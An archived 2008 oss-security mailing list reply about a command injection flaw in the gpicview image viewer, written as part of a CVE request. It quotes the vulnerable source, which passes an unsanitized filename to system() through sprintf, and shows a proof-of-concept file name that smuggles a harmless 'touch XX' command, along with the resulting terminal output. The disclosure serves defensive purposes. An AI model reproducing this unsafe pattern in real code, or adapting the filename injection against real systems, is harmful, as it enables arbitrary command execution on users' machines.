Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 3 Sep 2008 01:59:47 +0200
From: Robert Buchholz <rbu@...too.org>
To: oss-security@...ts.openwall.com
Subject: Re: CVE Request (gpicview)

On Sunday 31 August 2008, Nico Golde wrote:
> Same piece of code main-win.c doesn't look too trustworthy
> to me either:
>
>     690     int error = jpegtran (filename, "/tmp/rot.jpg" , code);
>     691     if(error)
>     692         return error;
>     693
>     694     //now copy /tmp/rot.jpg back to the original file
>     695     char command[strlen(filename)+50]; //this should not
> generate buffer owerflow 696     // MS: didn't know, how to make it
> better, maybe an own copy routine 697     sprintf(command,"cp
> /tmp/rot.jpg \"%s\"",filename); 698     system(command);
>
> Anyone played with crafted file names?

Good catch! You need to append '.jpg' at the end of the crafed filename 
so the rotation via jpegtran is invoked, but besides that it works ok:

rbu@...nut ~/devel/gentoo/security/gpicview $ ls -l
total 484K
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg

rbu@...nut ~/devel/gentoo/security/gpicview $ gpicview *
QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc'
sh: .jpg: command not found
^C

rbu@...nut ~/devel/gentoo/security/gpicview $ ls -l
total 960K
-rw-------  1 rbu rbu 469K 2008-09-03 01:52 bla.jpg
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
-rw-------  1 rbu rbu    0 2008-09-03 01:52 XX


Robert

Download attachment "signature.asc " of type "application/pgp-signature" (836 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.